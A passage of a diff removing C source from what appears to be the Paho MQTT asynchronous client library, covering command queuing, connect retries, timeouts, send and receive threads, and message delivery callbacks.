-				else if (command->command.details.conn.MQTTVersion == MQTTVERSION_3_1_1)
-					command->command.details.conn.MQTTVersion = MQTTVERSION_3_1;
-			}
-			else
-				command->command.details.conn.MQTTVersion = command->client->c->MQTTVersion;
-
-			Log(TRACE_MIN, -1, "Connecting to serverURI %s with MQTT version %d", serverURI, command->command.details.conn.MQTTVersion);
-#if defined(OPENSSL)
-			rc = MQTTProtocol_connect(serverURI, command->client->c, command->client->ssl, command->command.details.conn.MQTTVersion);
-#else
-			rc = MQTTProtocol_connect(serverURI, command->client->c, command->command.details.conn.MQTTVersion);
-#endif
-			if (command->client->c->connect_state == 0)
-				rc = SOCKET_ERROR;
-
-			/* if the TCP connect is pending, then we must call select to determine when the connect has completed,
-			which is indicated by the socket being ready *either* for reading *or* writing.  The next couple of lines
-			make sure we check for writeability as well as readability, otherwise we wait around longer than we need to
-			in Socket_getReadySocket() */
-			if (rc == EINPROGRESS)
-				Socket_addPendingWrite(command->client->c->net.socket);
-		}
-	}
-	else if (command->command.type == SUBSCRIBE)
-	{
-		List* topics = ListInitialize();
-		List* qoss = ListInitialize();
-		int i;
-
-		for (i = 0; i < command->command.details.sub.count; i++)
-		{
-			ListAppend(topics, command->command.details.sub.topics[i], strlen(command->command.details.sub.topics[i]));
-			ListAppend(qoss, &command->command.details.sub.qoss[i], sizeof(int));
-		}
-		rc = MQTTProtocol_subscribe(command->client->c, topics, qoss, command->command.token);
-		ListFreeNoContent(topics);
-		ListFreeNoContent(qoss);
-	}
-	else if (command->command.type == UNSUBSCRIBE)
-	{
-		List* topics = ListInitialize();
-		int i;
-
-		for (i = 0; i < command->command.details.unsub.count; i++)
-			ListAppend(topics, command->command.details.unsub.topics[i], strlen(command->command.details.unsub.topics[i]));
-
-		rc = MQTTProtocol_unsubscribe(command->client->c, topics, command->command.token);
-		ListFreeNoContent(topics);
-	}
-	else if (command->command.type == PUBLISH)
-	{
-		Messages* msg = NULL;
-		Publish* p = NULL;
-
-		p = malloc(sizeof(Publish));
-
-		p->payload = command->command.details.pub.payload;
-		p->payloadlen = command->command.details.pub.payloadlen;
-		p->topic = command->command.details.pub.destinationName;
-		p->msgId = command->command.token;
-
-		rc = MQTTProtocol_startPublish(command->client->c, p, command->command.details.pub.qos, command->command.details.pub.retained, &msg);
-
-		if (command->command.details.pub.qos == 0)
-		{
-			if (rc == TCPSOCKET_COMPLETE)
-			{
-				if (command->command.onSuccess)
-				{
-					MQTTAsync_successData data;
-
-					data.token = command->command.token;
-					data.alt.pub.destinationName = command->command.details.pub.destinationName;
-					data.alt.pub.message.payload = command->command.details.pub.payload;
-					data.alt.pub.message.payloadlen = command->command.details.pub.payloadlen;
-					data.alt.pub.message.qos = command->command.details.pub.qos;
-					data.alt.pub.message.retained = command->command.details.pub.retained;
-					Log(TRACE_MIN, -1, "Calling publish success for client %s", command->client->c->clientID);
-					(*(command->command.onSuccess))(command->command.context, &data);
-				}
-			}
-			else
-			{
-				command->command.details.pub.destinationName = NULL; /* this will be freed by the protocol code */
-				command->client->pending_write = &command->command;
-			}
-		}
-		else
-			command->command.details.pub.destinationName = NULL; /* this will be freed by the protocol code */
-		free(p); /* should this be done if the write isn't complete? */
-	}
-	else if (command->command.type == DISCONNECT)
-	{
-		if (command->client->c->connect_state != 0 || command->client->c->connected != 0)
-		{
-			command->client->c->connect_state = -2;
-			MQTTAsync_checkDisconnect(command->client, &command->command);
-		}
-	}
-
-	if (command->command.type == CONNECT && rc != SOCKET_ERROR && rc != MQTTASYNC_PERSISTENCE_ERROR)
-	{
-		command->client->connect = command->command;
-		MQTTAsync_freeCommand(command);
-	}
-	else if (command->command.type == DISCONNECT)
-	{
-		command->client->disconnect = command->command;
-		MQTTAsync_freeCommand(command);
-	}
-	else if (command->command.type == PUBLISH && command->command.details.pub.qos == 0)
-	{
-		if (rc == TCPSOCKET_INTERRUPTED)
-			ListAppend(command->client->responses, command, sizeof(command));
-		else
-			MQTTAsync_freeCommand(command);
-	}
-	else if (rc == SOCKET_ERROR || rc == MQTTASYNC_PERSISTENCE_ERROR)
-	{
-		if (command->command.type == CONNECT)
-		{
-			MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-			MQTTAsync_disconnect(command->client, &opts); /* not "internal" because we don't want to call connection lost */
-			command->client->shouldBeConnected = 1; /* as above call is not "internal" we need to reset this */
-		}
-		else
-			MQTTAsync_disconnect_internal(command->client, 0);
-
-		if (command->command.type == CONNECT && MQTTAsync_checkConn(&command->command, command->client))
-		{
-			Log(TRACE_MIN, -1, "Connect failed, more to try");
-
-                        if (command->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-                        {
-                            if (command->command.details.conn.MQTTVersion == MQTTVERSION_3_1)
-                            {
-                                command->command.details.conn.currentURI++;
-                                command->command.details.conn.MQTTVersion = MQTTVERSION_DEFAULT;
-                            }
-                        }
-                        else
-                            command->command.details.conn.currentURI++;
-
-			/* put the connect command back to the head of the command queue, using the next serverURI */
-			rc = MQTTAsync_addCommand(command, sizeof(command->command.details.conn));
-		}
-		else
-		{
-			if (command->command.onFailure)
-			{
-				Log(TRACE_MIN, -1, "Calling command failure for client %s", command->client->c->clientID);
-				(*(command->command.onFailure))(command->command.context, NULL);
-			}
-			MQTTAsync_freeCommand(command);  /* free up the command if necessary */
-		}
-	}
-	else /* put the command into a waiting for response queue for each client, indexed by msgid */
-		ListAppend(command->client->responses, command, sizeof(command));
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	rc = (command != NULL);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void nextOrClose(MQTTAsyncs* m, int rc, char* message)
-{
-	if (MQTTAsync_checkConn(&m->connect, m))
-	{
-		MQTTAsync_queuedCommand* conn;
-
-		MQTTAsync_closeOnly(m->c);
-		/* put the connect command back to the head of the command queue, using the next serverURI */
-		conn = malloc(sizeof(MQTTAsync_queuedCommand));
-		memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-		conn->client = m;
-		conn->command = m->connect;
-		Log(TRACE_MIN, -1, "Connect failed, more to try");
-
-                if (conn->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-                {
-                    if (conn->command.details.conn.MQTTVersion == MQTTVERSION_3_1)
-                    {
-                        conn->command.details.conn.currentURI++;
-                        conn->command.details.conn.MQTTVersion = MQTTVERSION_DEFAULT;
-                    }
-                }
-                else
-                    conn->command.details.conn.currentURI++;
-
-		MQTTAsync_addCommand(conn, sizeof(m->connect));
-	}
-	else
-	{
-		MQTTAsync_closeSession(m->c);
-	  if (m->connect.onFailure)
-		{
-			MQTTAsync_failureData data;
-
-			data.token = 0;
-			data.code = rc;
-			data.message = message;
-			Log(TRACE_MIN, -1, "Calling connect failure for client %s", m->c->clientID);
-			(*(m->connect.onFailure))(m->connect.context, &data);
-		}
-		MQTTAsync_startConnectRetry(m);
-	}
-}
-
-
-static void MQTTAsync_checkTimeouts(void)
-{
-	ListElement* current = NULL;
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) < 3)
-		goto exit;
-
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	last = now;
-	while (ListNextElement(handles, &current))		/* for each client */
-	{
-		ListElement* cur_response = NULL;
-		int i = 0,
-			timed_out_count = 0;
-
-		MQTTAsyncs* m = (MQTTAsyncs*)(current->content);
-
-		/* check disconnect timeout */
-		if (m->c->connect_state == -2)
-			MQTTAsync_checkDisconnect(m, &m->disconnect);
-
-		/* check connect timeout */
-		if (m->c->connect_state != 0 && MQTTAsync_elapsed(m->connect.start_time) > (m->connectTimeout * 1000))
-		{
-			nextOrClose(m, MQTTASYNC_FAILURE, "TCP connect timeout");
-			continue;
-		}
-
-		timed_out_count = 0;
-		/* check response timeouts */
-		while (ListNextElement(m->responses, &cur_response))
-		{
-			MQTTAsync_queuedCommand* com = (MQTTAsync_queuedCommand*)(cur_response->content);
-
-			if (1 /*MQTTAsync_elapsed(com->command.start_time) < 120000*/)
-				break; /* command has not timed out */
-			else
-			{
-				if (com->command.onFailure)
-				{
-					Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-								MQTTPacket_name(com->command.type), m->c->clientID);
-					(*(com->command.onFailure))(com->command.context, NULL);
-				}
-				timed_out_count++;
-			}
-		}
-		for (i = 0; i < timed_out_count; ++i)
-			ListRemoveHead(m->responses);	/* remove the first response in the list */
-
-		if (m->automaticReconnect && m->retrying)
-		{
-			if (m->reconnectNow || MQTTAsync_elapsed(m->lastConnectionFailedTime) > (m->currentInterval * 1000))
-			{
-				/* to reconnect put the connect command to the head of the command queue */
-				MQTTAsync_queuedCommand* conn = malloc(sizeof(MQTTAsync_queuedCommand));
-				memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-				conn->client = m;
-				conn->command = m->connect;
-	  			/* make sure that the version attempts are restarted */
-				if (m->c->MQTTVersion == MQTTVERSION_DEFAULT)
-					conn->command.details.conn.MQTTVersion = 0;
-				Log(TRACE_MIN, -1, "Automatically attempting to reconnect");
-				MQTTAsync_addCommand(conn, sizeof(m->connect));
-				m->reconnectNow = 0;
-			}
-		}
-	}
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-exit:
-	FUNC_EXIT;
-}
-
-
-static thread_return_type WINAPI MQTTAsync_sendThread(void* n)
-{
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	sendThread_state = RUNNING;
-	sendThread_id = Thread_getid();
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	while (!tostop)
-	{
-		int rc;
-
-		while (commands->count > 0)
-		{
-			if (MQTTAsync_processCommand() == 0)
-				break;  /* no commands were processed, so go into a wait */
-		}
-#if !defined(WIN32) && !defined(WIN64)
-		if ((rc = Thread_wait_cond(send_cond, 1)) != 0 && rc != ETIMEDOUT)
-			Log(LOG_ERROR, -1, "Error %d waiting for condition variable", rc);
-#else
-		if ((rc = Thread_wait_sem(send_sem, 1000)) != 0 && rc != ETIMEDOUT)
-			Log(LOG_ERROR, -1, "Error %d waiting for semaphore", rc);
-#endif
-
-		MQTTAsync_checkTimeouts();
-	}
-	sendThread_state = STOPPING;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	sendThread_state = STOPPED;
-	sendThread_id = 0;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTAsync_emptyMessageQueue(Clients* client)
-{
-	FUNC_ENTRY;
-	/* empty message queue */
-	if (client->messageQueue->count > 0)
-	{
-		ListElement* current = NULL;
-		while (ListNextElement(client->messageQueue, &current))
-		{
-			qEntry* qe = (qEntry*)(current->content);
-			free(qe->topicName);
-			free(qe->msg->payload);
-			free(qe->msg);
-		}
-		ListEmpty(client->messageQueue);
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_removeResponsesAndCommands(MQTTAsyncs* m)
-{
-	int count = 0;
-	ListElement* current = NULL;
-	ListElement *next = NULL;
-
-	FUNC_ENTRY;
-	if (m->responses)
-	{
-		ListElement* cur_response = NULL;
-
-		while (ListNextElement(m->responses, &cur_response))
-		{
-			MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(cur_response->content);
-
-			if (command->command.onFailure)
-			{
-				MQTTAsync_failureData data;
-
-				data.token = command->command.token;
-				data.code = MQTTASYNC_OPERATION_INCOMPLETE; /* interrupted return code */
-				data.message = NULL;
-
-				Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-						MQTTPacket_name(command->command.type), m->c->clientID);
-				(*(command->command.onFailure))(command->command.context, &data);
-			}
-
-			MQTTAsync_freeCommand1(command);
-			count++;
-		}
-	}
-	ListEmpty(m->responses);
-	Log(TRACE_MINIMUM, -1, "%d responses removed for client %s", count, m->c->clientID);
-
-	/* remove commands in the command queue relating to this client */
-	count = 0;
-	current = ListNextElement(commands, &next);
-	ListNextElement(commands, &next);
-	while (current)
-	{
-		MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (command->client == m)
-		{
-			ListDetach(commands, command);
-
-			if (command->command.onFailure)
-			{
-				MQTTAsync_failureData data;
-
-				data.token = command->command.token;
-				data.code = MQTTASYNC_OPERATION_INCOMPLETE; /* interrupted return code */
-				data.message = NULL;
-
-				Log(TRACE_MIN, -1, "Calling %s failure for client %s",
-							MQTTPacket_name(command->command.type), m->c->clientID);
-					(*(command->command.onFailure))(command->command.context, &data);
-			}
-
-			MQTTAsync_freeCommand(command);
-			count++;
-		}
-		current = next;
-		ListNextElement(commands, &next);
-	}
-	Log(TRACE_MINIMUM, -1, "%d commands removed for client %s", count, m->c->clientID);
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_destroy(MQTTAsync* handle)
-{
-	MQTTAsyncs* m = *handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL)
-		goto exit;
-
-	MQTTAsync_removeResponsesAndCommands(m);
-	ListFree(m->responses);
-
-	if (m->c)
-	{
-		int saved_socket = m->c->net.socket;
-		char* saved_clientid = MQTTStrdup(m->c->clientID);
-#if !defined(NO_PERSISTENCE)
-		MQTTPersistence_close(m->c);
-#endif
-		MQTTAsync_emptyMessageQueue(m->c);
-		MQTTProtocol_freeClient(m->c);
-		if (!ListRemove(bstate->clients, m->c))
-			Log(LOG_ERROR, 0, NULL);
-		else
-			Log(TRACE_MIN, 1, NULL, saved_clientid, saved_socket);
-		free(saved_clientid);
-	}
-
-	if (m->serverURI)
-		free(m->serverURI);
-	if (m->createOptions)
-		free(m->createOptions);
-	MQTTAsync_freeServerURIs(m);
-	if (!ListRemove(handles, m))
-		Log(LOG_ERROR, -1, "free error");
-	*handle = NULL;
-	if (bstate->clients->count == 0)
-		MQTTAsync_terminate();
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_freeMessage(MQTTAsync_message** message)
-{
-	FUNC_ENTRY;
-	free((*message)->payload);
-	free(*message);
-	*message = NULL;
-	FUNC_EXIT;
-}
-
-
-void MQTTAsync_free(void* memory)
-{
-	FUNC_ENTRY;
-	free(memory);
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_completeConnection(MQTTAsyncs* m, MQTTPacket* pack)
-{
-	int rc = MQTTASYNC_FAILURE;
-
-	FUNC_ENTRY;
-	if (m->c->connect_state == 3) /* MQTT connect sent - wait for CONNACK */
-	{
-		Connack* connack = (Connack*)pack;
-		Log(LOG_PROTOCOL, 1, NULL, m->c->net.socket, m->c->clientID, connack->rc);
-		if ((rc = connack->rc) == MQTTASYNC_SUCCESS)
-		{
-			m->retrying = 0;
-			m->c->connected = 1;
-			m->c->good = 1;
-			m->c->connect_state = 0;
-			if (m->c->cleansession)
-				rc = MQTTAsync_cleanSession(m->c);
-			if (m->c->outboundMsgs->count > 0)
-			{
-				ListElement* outcurrent = NULL;
-
-				while (ListNextElement(m->c->outboundMsgs, &outcurrent))
-				{
-					Messages* m = (Messages*)(outcurrent->content);
-					m->lastTouch = 0;
-				}
-				MQTTProtocol_retry((time_t)0, 1, 1);
-				if (m->c->connected != 1)
-					rc = MQTTASYNC_DISCONNECTED;
-			}
-		}
-		free(connack);
-		m->pack = NULL;
-#if !defined(WIN32) && !defined(WIN64)
-		Thread_signal_cond(send_cond);
-#else
-		if (!Thread_check_sem(send_sem))
-			Thread_post_sem(send_sem);
-#endif
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/* This is the thread function that handles the calling of callback functions if set */
-static thread_return_type WINAPI MQTTAsync_receiveThread(void* n)
-{
-	long timeout = 10L; /* first time in we have a small timeout.  Gets things started more quickly */
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	receiveThread_state = RUNNING;
-	receiveThread_id = Thread_getid();
-	while (!tostop)
-	{
-		int rc = SOCKET_ERROR;
-		int sock = -1;
-		MQTTAsyncs* m = NULL;
-		MQTTPacket* pack = NULL;
-
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		pack = MQTTAsync_cycle(&sock, timeout, &rc);
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		if (tostop)
-			break;
-		timeout = 1000L;
-
-		if (sock == 0)
-			continue;
-		/* find client corresponding to socket */
-		if (ListFindItem(handles, &sock, clientSockCompare) == NULL)
-		{
-			Log(TRACE_MINIMUM, -1, "Could not find client corresponding to socket %d", sock);
-			/* Socket_close(sock); - removing socket in this case is not necessary (Bug 442400) */
-			continue;
-		}
-		m = (MQTTAsyncs*)(handles->current->content);
-		if (m == NULL)
-		{
-			Log(LOG_ERROR, -1, "Client structure was NULL for socket %d - removing socket", sock);
-			Socket_close(sock);
-			continue;
-		}
-		if (rc == SOCKET_ERROR)
-		{
-			Log(TRACE_MINIMUM, -1, "Error from MQTTAsync_cycle() - removing socket %d", sock);
-			if (m->c->connected == 1)
-			{
-				MQTTAsync_unlock_mutex(mqttasync_mutex);
-				MQTTAsync_disconnect_internal(m, 0);
-				MQTTAsync_lock_mutex(mqttasync_mutex);
-			}
-			else if (m->c->connect_state != 0)
-				nextOrClose(m, rc, "socket error");
-			else /* calling disconnect_internal won't have any effect if we're already disconnected */
-				MQTTAsync_closeOnly(m->c);
-		}
-		else
-		{
-			if (m->c->messageQueue->count > 0)
-			{
-				qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-				int topicLen = qe->topicLen;
-
-				if (strlen(qe->topicName) == topicLen)
-					topicLen = 0;
-
-				if (m->ma)
-					rc = MQTTAsync_deliverMessage(m, qe->topicName, topicLen, qe->msg);
-				else
-					rc = 1;
-
-				if (rc)
-				{
-					ListRemove(m->c->messageQueue, qe);
-#if !defined(NO_PERSISTENCE)
-					if (m->c->persistence)
-						MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-#endif
-				}
-				else
-					Log(TRACE_MIN, -1, "False returned from messageArrived for client %s, message remains on queue",
-						m->c->clientID);
-			}
-			if (pack)
-			{
-				if (pack->header.bits.type == CONNACK)
-				{
-					int sessionPresent = ((Connack*)pack)->flags.bits.sessionPresent;
-					int rc = MQTTAsync_completeConnection(m, pack);
-
-					if (rc == MQTTASYNC_SUCCESS)
-					{
-						int onSuccess = 0;
-						if (m->serverURIcount > 0)
-							Log(TRACE_MIN, -1, "Connect succeeded to %s",
-								m->serverURIs[m->connect.details.conn.currentURI]);
-						onSuccess = (m->connect.onSuccess != NULL); /* save setting of onSuccess callback */
-						if (m->connect.onSuccess)
-						{
-							MQTTAsync_successData data;
-							memset(&data, '\0', sizeof(data));
-							Log(TRACE_MIN, -1, "Calling connect success for client %s", m->c->clientID);
-							if (m->serverURIcount > 0)
-								data.alt.connect.serverURI = m->serverURIs[m->connect.details.conn.currentURI];
-							else
-								data.alt.connect.serverURI = m->serverURI;
-							data.alt.connect.MQTTVersion = m->connect.details.conn.MQTTVersion;
-							data.alt.connect.sessionPresent = sessionPresent;
-							(*(m->connect.onSuccess))(m->connect.context, &data);
-							m->connect.onSuccess = NULL; /* don't accidentally call it again */
-						}
-						if (m->connected)
-						{
-							char* reason = (onSuccess) ? "connect onSuccess called" : "automatic reconnect";
-							Log(TRACE_MIN, -1, "Calling connected for client %s", m->c->clientID);
-							(*(m->connected))(m->connected_context, reason);
-						}
-					}
-					else
-						nextOrClose(m, rc, "CONNACK return code");
-				}
-				else if (pack->header.bits.type == SUBACK)
-				{
-					ListElement* current = NULL;
-
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == ((Suback*)pack)->msgId)
-						{
-							Suback* sub = (Suback*)pack;
-							if (!ListDetach(m->responses, command)) /* remove the response from the list */
-								Log(LOG_ERROR, -1, "Subscribe command not removed from command list");
-
-							/* Call the failure callback if there is one subscribe in the MQTT packet and
-							 * the return code is 0x80 (failure).  If the MQTT packet contains >1 subscription
-							 * request, then we call onSuccess with the list of returned QoSs, which inelegantly,
-							 * could include some failures, or worse, the whole list could have failed.
-							 */
-							if (sub->qoss->count == 1 && *(int*)(sub->qoss->first->content) == MQTT_BAD_SUBSCRIBE)
-							{
-								if (command->command.onFailure)
-								{
-									MQTTAsync_failureData data;
-
-									data.token = command->command.token;
-									data.code = *(int*)(sub->qoss->first->content);
-									data.message = NULL;
-									Log(TRACE_MIN, -1, "Calling subscribe failure for client %s", m->c->clientID);
-									(*(command->command.onFailure))(command->command.context, &data);
-								}
-							}
-							else if (command->command.onSuccess)
-							{
-								MQTTAsync_successData data;
-								int* array = NULL;
-
-								if (sub->qoss->count == 1)
-									data.alt.qos = *(int*)(sub->qoss->first->content);
-								else if (sub->qoss->count > 1)
-								{
-									ListElement* cur_qos = NULL;
-									int* element = array = data.alt.qosList = malloc(sub->qoss->count * sizeof(int));
-									while (ListNextElement(sub->qoss, &cur_qos))
-										*element++ = *(int*)(cur_qos->content);
-								}
-								data.token = command->command.token;
-								Log(TRACE_MIN, -1, "Calling subscribe success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, &data);
-								if (array)
-									free(array);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-					rc = MQTTProtocol_handleSubacks(pack, m->c->net.socket);
-				}
-				else if (pack->header.bits.type == UNSUBACK)
-				{
-					ListElement* current = NULL;
-					int handleCalled = 0;
-
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == ((Unsuback*)pack)->msgId)
-						{
-							if (!ListDetach(m->responses, command)) /* remove the response from the list */
-								Log(LOG_ERROR, -1, "Unsubscribe command not removed from command list");
-							if (command->command.onSuccess)
-							{
-								rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-								handleCalled = 1;
-								Log(TRACE_MIN, -1, "Calling unsubscribe success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, NULL);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-					if (!handleCalled)
-						rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-				}
-			}
-		}
-	}
-	receiveThread_state = STOPPED;
-	receiveThread_id = 0;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-#if !defined(WIN32) && !defined(WIN64)
-	if (sendThread_state != STOPPED)
-		Thread_signal_cond(send_cond);
-#else
-	if (sendThread_state != STOPPED && !Thread_check_sem(send_sem))
-		Thread_post_sem(send_sem);
-#endif
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTAsync_stop(void)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (sendThread_state != STOPPED || receiveThread_state != STOPPED)
-	{
-		int conn_count = 0;
-		ListElement* current = NULL;
-
-		if (handles != NULL)
-		{
-			/* find out how many handles are still connected */
-			while (ListNextElement(handles, &current))
-			{
-				if (((MQTTAsyncs*)(current->content))->c->connect_state > 0 ||
-						((MQTTAsyncs*)(current->content))->c->connected)
-					++conn_count;
-			}
-		}
-		Log(TRACE_MIN, -1, "Conn_count is %d", conn_count);
-		/* stop the background thread, if we are the last one to be using it */
-		if (conn_count == 0)
-		{
-			int count = 0;
-			tostop = 1;
-			while ((sendThread_state != STOPPED || receiveThread_state != STOPPED) && ++count < 100)
-			{
-				MQTTAsync_unlock_mutex(mqttasync_mutex);
-				Log(TRACE_MIN, -1, "sleeping");
-				MQTTAsync_sleep(100L);
-				MQTTAsync_lock_mutex(mqttasync_mutex);
-			}
-			rc = 1;
-			tostop = 0;
-		}
-	}
-	FUNC_EXIT_RC(rc);
-}
-
-
-int MQTTAsync_setCallbacks(MQTTAsync handle, void* context,
-									MQTTAsync_connectionLost* cl,
-									MQTTAsync_messageArrived* ma,
-									MQTTAsync_deliveryComplete* dc)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || ma == NULL || m->c->connect_state != 0)
-		rc = MQTTASYNC_FAILURE;
-	else
-	{
-		m->context = context;
-		m->cl = cl;
-		m->ma = ma;
-		m->dc = dc;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_setConnected(MQTTAsync handle, void* context, MQTTAsync_connected* connected)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || m->c->connect_state != 0)
-		rc = MQTTASYNC_FAILURE;
-	else
-	{
-		m->connected_context = context;
-		m->connected = connected;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_closeOnly(Clients* client)
-{
-	FUNC_ENTRY;
-	client->good = 0;
-	client->ping_outstanding = 0;
-	if (client->net.socket > 0)
-	{
-		if (client->connected)
-			MQTTPacket_send_disconnect(&client->net, client->clientID);
-		Thread_lock_mutex(socket_mutex);
-#if defined(OPENSSL)
-		SSLSocket_close(&client->net);
-#endif
-		Socket_close(client->net.socket);
-		client->net.socket = 0;
-#if defined(OPENSSL)
-		client->net.ssl = NULL;
-#endif
-		Thread_unlock_mutex(socket_mutex);
-	}
-	client->connected = 0;
-	client->connect_state = 0;
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_closeSession(Clients* client)
-{
-	FUNC_ENTRY;
-	MQTTAsync_closeOnly(client);
-
-	if (client->cleansession)
-		MQTTAsync_cleanSession(client);
-
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing clients by client structure
- * @param a Async structure
- * @param b Client structure
- * @return boolean indicating whether a and b are equal
- */
-static int clientStructCompare(void* a, void* b)
-{
-	MQTTAsyncs* m = (MQTTAsyncs*)a;
-	return m->c == (Clients*)b;
-}
-
-
-static int MQTTAsync_cleanSession(Clients* client)
-{
-	int rc = 0;
-	ListElement* found = NULL;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_clear(client);
-#endif
-	MQTTProtocol_emptyMessageList(client->inboundMsgs);
-	MQTTProtocol_emptyMessageList(client->outboundMsgs);
-	MQTTAsync_emptyMessageQueue(client);
-	client->msgID = 0;
-
-	if ((found = ListFindItem(handles, client, clientStructCompare)) != NULL)
-	{
-		MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-		MQTTAsync_removeResponsesAndCommands(m);
-	}
-	else
-		Log(LOG_ERROR, -1, "cleanSession: did not find client structure in handles list");
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_deliverMessage(MQTTAsyncs* m, char* topicName, size_t topicLen, MQTTAsync_message* mm)
-{
-	int rc;
-
-	Log(TRACE_MIN, -1, "Calling messageArrived for client %s, queue depth %d",
-					m->c->clientID, m->c->messageQueue->count);
-	rc = (*(m->ma))(m->context, topicName, (int)topicLen, mm);
-	/* if 0 (false) is returned by the callback then it failed, so we don't remove the message from
-	 * the queue, and it will be retried later.  If 1 is returned then the message data may have been freed,
-	 * so we must be careful how we use it.
-	 */
-	return rc;
-}
-
-
-void Protocol_processPublication(Publish* publish, Clients* client)
-{
-	MQTTAsync_message* mm = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	mm = malloc(sizeof(MQTTAsync_message));
-
-	/* If the message is QoS 2, then we have already stored the incoming payload
-	 * in an allocated buffer, so we don't need to copy again.
-	 */
-	if (publish->header.bits.qos == 2)
-		mm->payload = publish->payload;
-	else
-	{
-		mm->payload = malloc(publish->payloadlen);
-		memcpy(mm->payload, publish->payload, publish->payloadlen);
-	}
-
-	mm->payloadlen = publish->payloadlen;
-	mm->qos = publish->header.bits.qos;
-	mm->retained = publish->header.bits.retain;
-	if (publish->header.bits.qos == 2)
-		mm->dup = 0;  /* ensure that a QoS2 message is not passed to the application with dup = 1 */
-	else
-		mm->dup = publish->header.bits.dup;
-	mm->msgid = publish->msgId;
-
-	if (client->messageQueue->count == 0 && client->connected)
-	{
-		ListElement* found = NULL;
-
-		if ((found = ListFindItem(handles, client, clientStructCompare)) == NULL)
-			Log(LOG_ERROR, -1, "processPublication: did not find client structure in handles list");
-		else
-		{
-			MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-
-			if (m->ma)
-				rc = MQTTAsync_deliverMessage(m, publish->topic, publish->topiclen, mm);
-		}
-	}
-
-	if (rc == 0) /* if message was not delivered, queue it up */
-	{
-		qEntry* qe = malloc(sizeof(qEntry));
-		qe->msg = mm;
-		qe->topicName = publish->topic;
-		qe->topicLen = publish->topiclen;
-		ListAppend(client->messageQueue, qe, sizeof(qe) + sizeof(mm) + mm->payloadlen + strlen(qe->topicName)+1);
-#if !defined(NO_PERSISTENCE)
-		if (client->persistence)
-			MQTTPersistence_persistQueueEntry(client, (MQTTPersistence_qEntry*)qe);
-#endif
-	}
-	publish->topic = NULL;
-	FUNC_EXIT;
-}
-
-
-static int retryLoopInterval = 5;
-
-static void setRetryLoopInterval(int keepalive)
-{
-	int proposed = keepalive / 10;
-
-	if (proposed < 1)
-		proposed = 1;
-	else if (proposed > 5)
-		proposed = 5;
-	if (proposed < retryLoopInterval)
-		retryLoopInterval = proposed;
-}
-
-
-int MQTTAsync_connect(MQTTAsync handle, const MQTTAsync_connectOptions* options)
-{
-	MQTTAsyncs* m = handle;
-	int rc = MQTTASYNC_SUCCESS;
